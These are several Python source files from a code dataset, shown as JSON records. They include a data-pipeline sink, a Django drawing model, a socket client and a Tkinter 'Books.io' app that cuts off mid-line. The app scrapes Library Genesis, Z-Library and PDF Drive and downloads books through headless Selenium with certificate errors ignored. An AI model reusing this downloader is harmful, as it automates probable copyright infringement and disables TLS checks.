This dictionary can be\n modified as required without consequences for the pipeline.\n \"\"\"\n pass\n\n\nclass FilterSink(Sink):\n \"\"\"\n Common sink base class that adds several inclusion and exclusion\n configuration options for filtering data before using it.\n\n See :ref:`filter-sink-options` for more information.\n \"\"\"\n\n def declare_config(self, config):\n config.add_option(\n 'include',\n default=['*'],\n optional=True,\n schema={\n 'type': 'list',\n 'schema': {\n 'type': 'string',\n },\n },\n )\n\n config.add_option(\n 'include_files',\n default=[],\n optional=True,\n schema={\n 'type': 'list',\n 'schema': {\n 'type': 'string',\n 'empty': False,\n },\n },\n )\n\n config.add_option(\n 'exclude',\n default=[],\n optional=True,\n schema={\n 'type': 'list',\n 'schema': {\n 'type': 'string',\n },\n },\n )\n\n config.add_option(\n 'exclude_files',\n default=[],\n optional=True,\n schema={\n 'type': 'list',\n 'schema': {\n 'type': 'string',\n 'empty': False,\n },\n },\n )\n\n @abstractmethod\n def distribute(self, data):\n include = self.config.include.value\n for include_file in self.config.include_files.value:\n for pattern in load_filter_file(include_file):\n if pattern not in include:\n include.append(pattern)\n\n exclude = self.config.exclude.value\n for exclude_file in self.config.exclude_files.value:\n for pattern in load_filter_file(exclude_file):\n if pattern not in exclude:\n exclude.append(pattern)\n\n # Optimization when no filter is requested to the input data\n if include == ['*'] and not exclude:\n return\n\n filtered = filter_dict(data, include, exclude)\n data.clear()\n data.update(filtered)\n\n\n__all__ = [\n 'Sink',\n 'FilterSink',\n]\n","repo_name":"kuralabs/flowbber","sub_path":"lib/flowbber/components/sink.py","file_name":"sink.py","file_ext":"py","file_size_in_byte":3354,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18247102533","text":"from datetime import datetime\n\nfrom django.db.models import (\n ForeignKey,\n CharField,\n ImageField,\n Manager,\n ManyToManyField,\n PositiveIntegerField,\n Q,\n)\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom imagekit.models import ImageSpecField\nfrom imagekit.processors import ResizeToCover\nfrom model_utils.models import TimeStampedModel\n\nfrom .watermark import Watermark\n\nDRAWING_STATUS_STORED = 1\nDRAWING_STATUS_RESERVED = 2\nDRAWING_STATUS_SOLD = 3\n\nDRAWING_STATUS_CHOICES = (\n (DRAWING_STATUS_STORED, _('status-for-sale')),\n (DRAWING_STATUS_RESERVED, _('status-reserved')),\n (DRAWING_STATUS_SOLD, _('status-sold')),\n)\n\nDRAWING_AVAILABLE_STATES = [\n DRAWING_STATUS_STORED,\n]\n\n\nclass DrawingManager(Manager):\n def get_available(self):\n return self.filter(status__in=DRAWING_AVAILABLE_STATES)\n\n def get_price(self, ids):\n drawings = self.filter(id__in=ids).all()\n price = 0\n for drawing in drawings:\n price += drawing.get_price()\n\n return price\n\n\nclass Drawing(TimeStampedModel):\n objects = DrawingManager()\n name = CharField(\n max_length=255,\n verbose_name=_('field-name'),\n help_text=_('field-name-help-text'),\n )\n size = ForeignKey(\n 'DrawingSize',\n related_name='drawings',\n verbose_name=_('field-size'),\n )\n status = PositiveIntegerField(\n choices=DRAWING_STATUS_CHOICES,\n default=DRAWING_STATUS_STORED,\n verbose_name=_('field-drawing-status'),\n )\n image = ImageField(\n height_field=\"image_height\",\n upload_to='var/drawings',\n verbose_name=_(\"field-drawing-image\"),\n width_field=\"image_width\",\n 
)\n image_thumb_detail = ImageSpecField(\n source='image',\n format='JPEG',\n options={'quality': 95},\n processors=[\n ResizeToCover(600, 600),\n Watermark(\n 'web/static/images/watermark-black.png',\n 0.09,\n )\n ],\n )\n image_thumb_list = ImageSpecField(\n source='image',\n format='JPEG',\n options={'quality': 95},\n processors=[\n ResizeToCover(300, 300),\n Watermark(\n 'web/static/images/watermark-white.png',\n 0.1,\n ),\n ],\n )\n image_height = PositiveIntegerField(null=True)\n image_width = PositiveIntegerField(null=True)\n tags = ManyToManyField(\n 'DrawingTag',\n verbose_name=_('field-tags'),\n related_name='drawings',\n )\n\n class Meta:\n verbose_name = _('Drawing')\n verbose_name_plural = _('Drawings')\n\n def __str__(self):\n return '%s (%s)' % (self.name, self.size)\n\n def get_active_price_level(self):\n now = datetime.now()\n return self.price_levels.filter(\n (Q(valid_from__isnull=True) | Q(valid_from__gte=now)) &\n (Q(valid_until__isnull=True) | Q(valid_until__lte=now)),\n ).order_by('-created').first()\n\n def get_price(self):\n price_level = self.get_active_price_level()\n return price_level.price if price_level else None\n\n def is_price_visible(self):\n return self.status in DRAWING_AVAILABLE_STATES\n\n def is_status_visible(self):\n return self.status not in DRAWING_AVAILABLE_STATES\n\n def mark_as_reserved(self):\n self.status = DRAWING_STATUS_RESERVED\n\n def mark_as_sold(self):\n self.status = DRAWING_STATUS_SOLD\n\n def get_title(self):\n return '%s %s' % (self.size.name, self.name) if self.size.standalone_name else self.name\n","repo_name":"just-paja/malickosti-v-akvarelkach","sub_path":"drawings/models/drawing.py","file_name":"drawing.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"504244575","text":"import socket\r\n\r\nserver_ip = '127.0.0.1'\r\nport = 9999\r\n\r\nclient = socket.socket()\r\n\r\nclient.connect((server_ip, port))\r\nprint('---Connected to server---')\r\n\r\nprint(\"type your name: \")\r\nmsg = input()\r\n\r\nclient.send(bytes(msg, 'utf-8'))\r\nprint('---Sent a message---')\r\n\r\nmsg = client.recv(1024)\r\nprint('---Got a message---')\r\nprint(msg)\r\n\r\nclient.close()\r\n","repo_name":"MysteryHub32/MysteryHub32","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3188205459","text":"from mongoengine import Document, DateTimeField, BooleanField\nimport datetime\n\nclass BaseDocument(Document):\n meta = {'allow_inheritance': True}\n created_on = DateTimeField()\n modified_on = DateTimeField()\n deleted = BooleanField(default=False)\n\n def save(self, *args, **kwargs):\n if not self.created_on:\n self.created_on = datetime.datetime.now()\n self.modified_on = datetime.datetime.now()\n super(BaseDocument, self).save(*args, **kwargs)\n","repo_name":"ismail2smile/BookingHotel","sub_path":"baseDocumentConfig.py","file_name":"baseDocumentConfig.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5722941418","text":"import fitz\nimport requests\nimport time\nfrom bs4 import BeautifulSoup\nimport webbrowser \nfrom pandas import Series\nfrom pandas import DataFrame\nfrom pandas import read_html\nfrom numpy import array\nimport os\nfrom os import remove as os_remove\nfrom os import path as 
os_path\nfrom os import stat\nfrom os.path import exists\nfrom threading import Thread\nfrom socket import gethostbyname\nfrom socket import gethostname\nfrom pathlib import Path\nfrom download import download\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom tkinter import Tk\nfrom tkinter import PhotoImage\nfrom tkinter import Canvas\nfrom tkinter import Label\nfrom tkinter import Text\nfrom tkinter import Button\nfrom tkinter import messagebox\n# --------------------------------------------------------------------------------------------------------------------------------------------------------------------------\ndef epub_to_pdf_gen(): \n downloads_path = str(Path.home() / \"Downloads\")\n for fname in os.listdir(downloads_path):\n if fname.endswith('.epub'):\n fname_n = fname.split('.epub')[0]\n file_path_epub = f\"{downloads_path}\\\\{fname_n}.epub\"\n file_path_pdf = f\"{downloads_path}\\\\{fname_n}.pdf\"\n try:\n doc = fitz.open(file_path_epub)\n a = doc.convert_to_pdf()\n pdf = fitz.open(\"pdf\", a)\n pdf.save(file_path_pdf)\n doc.close()\n os_remove(file_path_epub)\n except:\n pass\n# --------------------------------------------------------------------------------------------------------------------------------------------------------------------\ndef remove_character_not_valid_in_pdfname(a):\n char_list = \"/:?*<>|\"\n for i in char_list:\n a = a.replace(i, \"\")\n return a\n# -------------------------------------------------------------------------------------------------------------------------------------------------------------------\npdf_size_to_download_for_zlib = \"\"\nbyte_info_for_pdfdrive = \"\"\nkeep_running = True\n# --------------------------------------------------------- LIBGEN -----------------------------------------------------------------------------------------\ndef downloaded_stat_for_libgen(Pdf_file_size_to_download):\n global keep_running\n while keep_running:\n for fname in os.listdir(downloads_path):\n if fname.endswith('.part'):\n try:\n file_size = os.path.getsize(f\"{downloads_path}\\\\{fname}\")\n info_text.config(text=f'Downloading....{round((file_size / (1024 * 1024)),1)} {Pdf_file_size_to_download.split()[1]} / {Pdf_file_size_to_download}')\n time.sleep(0.2) \n except Exception as e:\n print(e)\n if(keep_running == False):\n break\ndef search_in_libgen(author_searched_by_user, book_searched_by_user, extension):\n author = author_searched_by_user\n to_search = book_searched_by_user \n pdf_title = to_search\n to_search_online = to_search.replace(\" \", \"+\")\n link_to_search = f\"https://libgen.is/search.php?req={to_search_online}&open=0&res=100&view=simple&phrase=1&column=title\"\n download_of_libgen_completed = False\n # ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n list_of_dataframes = read_html(link_to_search)\n table = list_of_dataframes[2]\n a = list(table.loc[0])\n table.columns = a\n table.drop(0, axis=0, inplace=True)\n table.reset_index(inplace=True)\n table = table[(table['Extension'] == extension)]\n table.sort_values('Year', ascending=False, inplace=True)\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------\n result = requests.get(link_to_search)\n soup = BeautifulSoup(result.text, \"lxml\")\n 
titles_list = [soup.find_all('a', id=x)[0].getText() for x in table['ID']]\n table['Title'] = Series(titles_list, index=table.index, dtype='str')\n table = table.astype({'Author(s)': str, 'Title': str})\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n table_2 = table[['Author(s)', 'Title']]\n index_number = 0\n # ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n def check_for_author(index_for_author):\n actual_author_name = table_2['Author(s)'][index_for_author].split(\" \") \n result = False\n for word in actual_author_name:\n if (word in author):\n result = True\n break\n if(len(author) == 0):\n result = True\n return result\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n def check_for_title(title_of_book):\n len_of_book_searched = len(to_search.split(\" \"))\n len_of_book_by_libgen = len(title_of_book.split(\" \"))\n split_of_book_by_user = to_search.lower().split(\" \")\n split_of_book_by_libgen = title_of_book.lower().split(\" \")\n no_of_matches = 0\n if(len_of_book_searched <= len_of_book_by_libgen):\n for i in range(0, len_of_book_searched):\n if(split_of_book_by_libgen[i].lower() in split_of_book_by_user[i].lower()):\n no_of_matches += 1\n if(no_of_matches != len_of_book_searched):\n no_of_matches = 0\n for i in range(0, len_of_book_searched):\n if(split_of_book_by_user[i].lower() in split_of_book_by_libgen[i].lower()):\n no_of_matches += 1\n else:\n for i in range(0, len_of_book_by_libgen):\n if(split_of_book_by_libgen[i].lower() in split_of_book_by_user[i].lower()):\n no_of_matches += 1\n if(no_of_matches != len_of_book_by_libgen):\n no_of_matches = 0\n for i in range(0, len_of_book_by_libgen):\n if(split_of_book_by_user[i].lower() in split_of_book_by_libgen[i].lower()):\n no_of_matches += 1\n return ((no_of_matches == len_of_book_searched) or (no_of_matches == len_of_book_by_libgen))\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n book_found = False\n for i in table_2.index:\n if((check_for_title(table_2['Title'][i])) & (check_for_author(i))):\n book_found = True\n index_number = i\n break\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n if(book_found):\n result = requests.get(link_to_search)\n soup = BeautifulSoup(result.text, \"lxml\")\n a = soup.select(\".c > tr > td > a\")\n c = []\n for i in a:\n b = i.get('href')\n if(b.find(\"book\") == 0):\n c.append(b.split(\"=\")[1])\n index_of_book_to_download = c\n link_of_download_page = f\"http://library.lol/main/{index_of_book_to_download[index_number]}\"\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n result_2 = requests.get(link_of_download_page)\n soup = BeautifulSoup(result_2.text, \"lxml\")\n d = soup.select(\"#download > h2 > a\")\n download_link = 
d[0].get('href')\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n url = download_link\n book_name = remove_character_not_valid_in_pdfname(table_2['Title'][index_number])\n downloads_path = str(Path.home() / \"Downloads\")\n global keep_running\n if(extension == 'pdf'):\n info_text.config(text=\"Downloading....\")\n file_path = f\"{downloads_path}\\\\{book_name}.pdf\"\n file_path_while_downloading = f\"{downloads_path}\\\\{book_name}.pdf.part\"\n pdf_file_size_to_download = table.loc[index_number][\"Size\"]\n thread_3 = Thread(target=downloaded_stat_for_libgen,args=(pdf_file_size_to_download,))\n thread_3.start()\n path = download(url, file_path, replace=True,kind=\"file\", timeout=300.0) \n button_1['state'] = \"normal\" \n keep_running = False\n info_text.config(text=\"Book has been downloaded!\")\n download_of_libgen_completed = True\n elif(extension == 'epub'):\n info_text.config(text=\"Downloading....\")\n file_path = f\"{downloads_path}\\\\{book_name}.epub\"\n pdf_file_size_to_download = table.loc[index_number][\"Size\"]\n thread_3 = Thread(target=downloaded_stat_for_libgen,args=(pdf_file_size_to_download,))\n thread_3.start()\n path = download(url, file_path, replace=True,kind=\"file\", timeout=300.0)\n epub_to_pdf_gen()\n button_1['state'] = \"normal\"\n keep_running = False\n info_text.config(text=\"Book has been downloaded!\")\n download_of_libgen_completed = True\n else:\n download_of_libgen_completed = False\n return download_of_libgen_completed\n# -------------------------------------------------------------------------------------------------------------------------------------------------------------\n# ----------------------------------------------------------- PDF-Drive ------------------------------------------------------------------------------------------\ndef search_in_pdf_drive(author_searched_by_user, book_searched_by_user):\n author = author_searched_by_user\n author = author.split()\n to_search = book_searched_by_user\n pdf_title = to_search\n to_search_online = to_search.replace(\" \", \"-\")\n link_to_search = f\"http://www.pdfdrive.com/{to_search_online}-books.html\"\n download_of_pdfdrive_completed = False\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------\n try:\n result = requests.get(link_to_search)\n soup = BeautifulSoup(result.text, \"lxml\")\n name_of_books = soup.select(\".ai-search > h2\")\n year_of_books = soup.select(\".file-info > .fi-year \")\n downloads_of_books = soup.select(\".file-info > .fi-hit\")\n to_make_download_links = soup.select(\".file-right > a \")\n # ----------------------------------------------------------------------------------------------------------------------------------------------------------------------\n a = []\n b = []\n for x in name_of_books:\n a.append(x.getText())\n for y in downloads_of_books:\n b.append(int(y.getText().split(\" \")[0].replace(\",\", \"\")))\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------\n df_book = DataFrame(data=zip(a, b), columns=[\"Book\", \"Downloads\"])\n df_book = df_book.astype({\"Book\": str, \"Downloads\": int})\n df_book.sort_values(\"Downloads\", ascending=False, inplace=True)\n index_of_book = -1\n 
for x in df_book.index:\n if df_book.loc[x][\"Book\"].lower().find(to_search.lower()) == 0:\n index_of_book = x\n break\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------\n if index_of_book > -1:\n raw_download_link = to_make_download_links[index_of_book].get(\"href\")\n download_link = raw_download_link[::-1].replace(\"e\", \"d\", 1)[::-1]\n link_of_download_page = f\"http://www.pdfdrive.com{download_link}\"\n result = requests.get(f\"http://www.pdfdrive.com{raw_download_link}\")\n soup = BeautifulSoup(result.text, \"lxml\")\n book_info_for_pdfdrive = soup.select(\".ebook-file-info > .info-green\")\n global byte_info_for_pdfdrive\n for i in book_info_for_pdfdrive:\n if \"KB\" in i.getText():\n byte_info_for_pdfdrive = i.getText()\n break\n elif \"MB\" in i.getText():\n byte_info_for_pdfdrive = i.getText()\n break\n download_of_pdfdrive_completed = selenium_headless_downloader(\"pdfdrive\", link_of_download_page, \"pdf\")\n else:\n download_of_pdfdrive_completed = False\n except:\n pass\n return download_of_pdfdrive_completed\n# -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------ Zlib --------------------------------------------------------------------------------\ndef search_in_zlib(author_searched_by_user, book_searched_by_user, extension):\n author = author_searched_by_user\n to_search = book_searched_by_user\n pdf_title = to_search\n to_search_online = (to_search.replace(\" \", \"%20\") + \"%20\" + author.replace(\" \", \"%20\"))\n link_to_search = f\"https://b-ok.asia/s/{to_search_online}/?languages%5B0%5D=english&extensions%5B0%5D={extension}\"\n author = author.split()\n download_of_zlib_completed = False\n # --------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n try:\n result = requests.get(link_to_search)\n soup = BeautifulSoup(result.text, \"lxml\")\n a = soup.select(\".book-rating-interest-score\")\n b = soup.select(\".book-rating-quality-score\")\n book_rating_interest_score_list = array([float(x.getText().strip()) for x in a])\n book_rating_quality_score_list = array([float(y.getText().strip()) for y in b])\n rating_of_book_list = (book_rating_interest_score_list + book_rating_quality_score_list)\n d = soup.find_all(\"h3\", itemprop=\"name\")\n link_of_book_list = [(\"https://b-ok.asia\" + x.select(\"a\")[0].get(\"href\")) for x in d]\n title_of_book_list = [x.select(\"a\")[0].getText() for x in d]\n # ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n e = soup.find_all(\"div\", class_=\"authors\")\n author_list = []\n for length in e:\n individual_author_name = \"\"\n for element in length:\n individual_author_name = individual_author_name + element.getText() + \" \"\n author_list.append(individual_author_name)\n books_dataframe = DataFrame({\"Title\": title_of_book_list,\"Author\": author_list,\"Rating\": rating_of_book_list,\"Link\": link_of_book_list,})\n books_dataframe = books_dataframe.astype({\"Title\": str, \"Author\": str, \"Rating\": float, \"Link\": str})\n books_dataframe.sort_values(\"Rating\", 
ascending=False, inplace=True)\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------\n def check_for_author(index_for_author,): \n actual_author_name = books_dataframe[\"Author\"][index_for_author].split(\" \") \n result = (False)\n for (word) in (actual_author_name): \n if word in author: \n result = True\n break\n if len(author) == 0:\n result = True\n return result\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n def check_for_title(title_of_book,): \n len_of_book_searched = len(to_search.split(\" \")) \n len_of_book_by_zlib = len(title_of_book.split(\" \"))\n split_of_book_by_user = to_search.lower().split(\" \") \n split_of_book_by_zlib = title_of_book.lower().split(\" \") \n no_of_matches = 0 \n for i in range(0, len_of_book_by_zlib): \n if (split_of_book_by_zlib[i].lower() in to_search.lower()): \n no_of_matches += (1)\n if no_of_matches != len_of_book_by_zlib:\n no_of_matches = 0\n for i in range(0, len_of_book_searched): \n if (split_of_book_by_user[i].lower() in title_of_book.lower()): \n no_of_matches += 1\n return (no_of_matches == len_of_book_searched) or (no_of_matches == len_of_book_by_zlib)\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n book_found = False\n index_number = 0\n for(i) in (books_dataframe.index): \n if (check_for_title(books_dataframe[\"Title\"][i])) & (check_for_author(i)): \n book_found = True\n index_number = i \n break\n # ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n if book_found:\n link_of_download_page = books_dataframe.loc[index_number, \"Link\"]\n try:\n result = requests.get(link_of_download_page)\n soup = BeautifulSoup(result.text, \"lxml\")\n global pdf_size_to_download_for_zlib\n pdf_size_to_download_for_zlib = soup.select(\".bookDetailsBox > .bookProperty.property__file > .property_value \")[0].getText().split(\",\")[1]\n except:\n print(\"Error faced\")\n download_of_zlib_completed = selenium_headless_downloader(\"zlib\", link_of_download_page, extension)\n else:\n download_of_zlib_completed = False\n except:\n pass\n return download_of_zlib_completed\n# -------------------------------------------------------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------ SELENIUM FOR PDF-DRIVE & ZLIB ----------------------------------------------------------------\ndef resource_path(relative_path):\n try:\n base_path = sys._MEIPASS\n except Exception:\n base_path = os_path.dirname(__file__)\n return os_path.join(base_path, relative_path)\n# ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\ndef remove_unwanted_characters_for_pdfdrive(pdf_name: str,) -> str:\n chars = list(\"/:?*<>|,.();\")\n result = pdf_name\n for char in chars:\n result = result.replace(char, \"_\")\n return result\ndownloads_path = str(Path.home() / \"Downloads\")\n# 
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\ndef book_title_for_pdfdrive(download_link):\n result = requests.get(download_link)\n soup = BeautifulSoup(result.text, \"lxml\")\n a = soup.find(\"h1\", class_=\"ebook-title\")\n title_of_book = a.select(\"a\")[0].getText()\n title_of_book = title_of_book.replace(\":\", \"_\")\n return title_of_book\n# ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\ndef book_title_for_zlib(download_link):\n result = requests.get(download_link)\n soup = BeautifulSoup(result.text, \"lxml\")\n a = soup.find(\"h1\", itemprop=\"name\").getText()\n a = a.strip(\" \\n\")\n b = soup.find(\"div\", class_=\"col-sm-9\")\n b = b.find_all(\"a\", title=\"Find all the author's books\")\n title_of_pdf = a\n c = \"\"\n if len(b) > 1:\n for x in b:\n c = c + x.getText() + \", \"\n c = c.strip(\", \")\n title_of_pdf = title_of_pdf + \" \" + f\"({c})\"\n elif len(b) == 1:\n title_of_pdf = title_of_pdf + \" \" + f\"({b[0].getText()})\"\n return title_of_pdf\n# --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\ndef selenium_headless_downloader(website, download_link, extension):\n user_agent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36\"\n options = webdriver.ChromeOptions()\n options.headless = True\n options.add_argument(f\"user-agent={user_agent}\")\n options.add_argument(\"--window-size=1920,1080\")\n options.add_argument(\"--ignore-certificate-errors\")\n options.add_argument(\"--allow-running-insecure-content\")\n options.add_argument(\"--disable-extensions\")\n options.add_argument(\"--proxy-server='direct://'\")\n options.add_argument(\"--proxy-bypass-list=*\")\n options.add_argument(\"--start-maximized\")\n options.add_argument(\"--disable-gpu\")\n options.add_argument(\"--disable-dev-shm-usage\")\n options.add_argument(\"--no-sandbox\")\n options.add_experimental_option(\"detach\", True)\n driver = webdriver.Chrome(resource_path(\"chromedriver.exe\"), options=options)\n params = {\"behavior\": \"allow\", \"downloadPath\": downloads_path}\n driver.execute_cdp_cmd(\"Page.setDownloadBehavior\", params)\n download_complete_via_selenium = False\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n if website == \"pdfdrive\":\n try:\n driver.get(download_link)\n except:\n info_text.config(text=\"Servor Error. Please Try Again\")\n button_1['state'] = \"normal\"\n driver.implicitly_wait(10)\n webdriver.ActionChains(driver).send_keys(Keys.ESCAPE).perform()\n content = driver.find_elements(By.CLASS_NAME, \"btn.btn-success.btn-responsive\") \n if len(content) == 0:\n content = driver.find_element(By.CLASS_NAME, \"btn.btn-primary.btn-user\") \n else:\n content = driver.find_element(By.CLASS_NAME, \"btn.btn-success.btn-responsive\") \n elif website == \"zlib\":\n try:\n driver.get(download_link)\n except:\n info_text.config(text=\"Servor Error. 
Please Try Again\")\n button_1['state'] = \"normal\"\n content = driver.find_element(By.CLASS_NAME, \"book-details-button\")\n # --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n content.click()\n # --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n title_of_book = \"\"\n if website == \"pdfdrive\":\n print(\"Downloading E-Book from PDF-Drive Please check your Downloads Folder\")\n info_text.config(text=\"Downloading....\")\n title_of_book = book_title_for_pdfdrive(download_link)\n title_of_book = remove_unwanted_characters_for_pdfdrive(title_of_book)\n title_of_book = title_of_book + \" ( PDFDrive )\"\n file_name_pdfdrive = \"\" \n path_to_file = \"\" \n while True:\n for fname in os.listdir(downloads_path):\n if fname.endswith('.crdownload'):\n if(file_name_pdfdrive == \"\"):\n file_name_pdfdrive = fname.split(\".crdownload\")[0]\n path_to_file = f\"{downloads_path}\\\\{file_name_pdfdrive}\"\n try:\n file_size = os.path.getsize(f\"{downloads_path}\\\\{fname}\")\n info_text.config(text=f'Downloading....{round((file_size / (1024 * 1024)),1)} {byte_info_for_pdfdrive.split()[1]} / {byte_info_for_pdfdrive}')\n time.sleep(0.2)\n except Exception as e:\n print(e)\n elif (fname == file_name_pdfdrive):\n path_to_file = f\"{downloads_path}\\\\{file_name_pdfdrive}\" \n break\n try:\n file_exists = exists(path_to_file)\n if file_exists:\n break\n except Exception as e:\n print(e)\n pass\n epub_to_pdf_gen()\n download_complete_via_selenium = True\n button_1['state'] = \"normal\"\n info_text.config(text=\"Book has been downloaded!\")\n driver.quit()\n elif website == \"zlib\":\n result = requests.get(driver.current_url)\n soup = BeautifulSoup(result.text, \"lxml\")\n try:\n driver.find_element(By.CLASS_NAME, \"download-limits-error\")\n download_complete_via_selenium = False\n print(\"Zlibs Daily Limit Error\")\n except:\n print(\"Downloading E-Book from Zlib \\nPlease check your Downloads Folder\")\n info_text.config(text=\"Downloading....\")\n title_of_book = book_title_for_zlib(download_link)\n title_of_book = remove_character_not_valid_in_pdfname(title_of_book)\n title_of_book = title_of_book + \" (z-lib.org)\"\n file_name_zlib = \"\" \n path_to_file = \"\" \n while True:\n for fname in os.listdir(downloads_path):\n if fname.endswith('.crdownload'):\n if(file_name_zlib == \"\"):\n file_name_zlib = fname.split(\".crdownload\")[0]\n path_to_file = f\"{downloads_path}\\\\{file_name_zlib}\"\n try:\n file_size = os.path.getsize(f\"{downloads_path}\\\\{fname}\")\n info_text.config(text=f'Downloading....{round((file_size / (1024 * 1024)),1)} MB / {str(pdf_size_to_download_for_zlib)}')\n time.sleep(0.2)\n except Exception as e:\n print(e)\n elif (fname == file_name_zlib):\n path_to_file = f\"{downloads_path}\\\\{file_name_zlib}\" \n break\n try:\n file_exists = exists(path_to_file)\n if file_exists:\n break\n except Exception as e:\n print(e)\n pass\n download_complete_via_selenium = True\n epub_to_pdf_gen()\n button_1['state'] = \"normal\"\n info_text.config(text=\"Book has been downloaded!\")\n driver.quit()\n return download_complete_via_selenium\n# -------------------------------------------------------------------------------------------------------------------------------------------------------------\n# 
--------------------------------------------------------------- SEARCH A BOOK ---------------------------------------------------------------------------------------------------------------------\ndef remove_unwanted_characters_from_author(a):\n char_list = \"/:?*<>|,.();\"\n for i in char_list:\n a = a.replace(i, \"\")\n return a\ndef easy_search_for_book(a):\n char_list = \":?;*,(|#[!@$%+={<\"\n for i in char_list:\n if(i in a):\n a = a.split(i)[0]\n break\n return a\n# ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\ndef search_the_book(author_, book_):\n author = author_\n book = book_\n characters_to_strip = \" .,;:/?!#*&^-}_{~`@$%)[](<>|+=\"\n author = author.strip(characters_to_strip)\n book = book.strip(characters_to_strip)\n author = remove_unwanted_characters_from_author(author)\n book = easy_search_for_book(book)\n# ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n extension_pdf = 'pdf'\n if(search_in_libgen(author, book, extension_pdf) == False):\n if(search_in_zlib(author, book, extension_pdf) == False):\n extension_epub = 'epub'\n if(search_in_libgen(author, book, extension_epub) == False):\n if(search_in_zlib(author, book, extension_epub) == False):\n extension_pdf = 'pdf'\n if(search_in_pdf_drive(author, book) == False):\n print('The Book is not available in the Ebook Format')\n info_text.config(text=\"Book Not Available\")\n button_1['state'] = \"normal\"\n# -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n# --------------------------------------------------------Current GUI -----------------------------------------------------------------------------------------------------------------------\nwindow = Tk()\nwindow.geometry(\"574x230\")\nwindow.title(\"Books.io\")\nphoto = PhotoImage(file=resource_path(\"book.png\"))\nwindow.iconphoto(False, photo)\nwindow.configure(bg=\"#FFFFFF\")\ncanvas = Canvas(window,bg=\"#FFFFFF\",height=287,width=574,bd=0,highlightthickness=0,relief=\"ridge\")\ncanvas.place(x=0, y=0)\ncanvas.create_text(27.600372314453125,96.34383392333984,anchor=\"nw\",text=\"Author\",fill=\"#000000\",font=(\"Abel Regular\", 20 * -1))\ninfo_text = Label(window,background=\"#FFFFFF\",text=\"\",font=(\"Abel Regular\", 7))\ninfo_text.place(relx=0.0,rely=1.0,anchor='sw')\ninfo_text_for_download = Label(window,background=\"#FFFFFF\",text=\"Tip: Use the exact Book Title and Author Name\",font=(\"Abel Regular\", 7),fg=\"green\")\ninfo_text_for_download.place(relx=0.16,rely=0.04)\ndef callback(url):\n webbrowser.open_new_tab(url)\ninfo_text_for_github = Label(window,background=\"#FFFFFF\",text=\"Give a star to our project\",fg=\"blue\",cursor=\"hand2\",font=(\"Abel Regular\", 7))\ninfo_text_for_github.pack()\ninfo_text_for_github.bind(\"\", lambda e: callback(\"https://github.com/RohitKonge/PDF-Version-of-any-Book\"))\ninfo_text_for_github.place(relx=1.0,rely=1.0,anchor='se')\ncanvas.create_text(32.243743896484375,28.401931762695312,anchor=\"nw\",text=\"Book\",fill=\"#000000\",font=(\"Abel Regular\", 20 * -1))\nentry_image_1 = PhotoImage(file=resource_path(\"entry_1.png\"))\nentry_bg_1 = canvas.create_image(316.0,38.5,image=entry_image_1)\nentry_1 
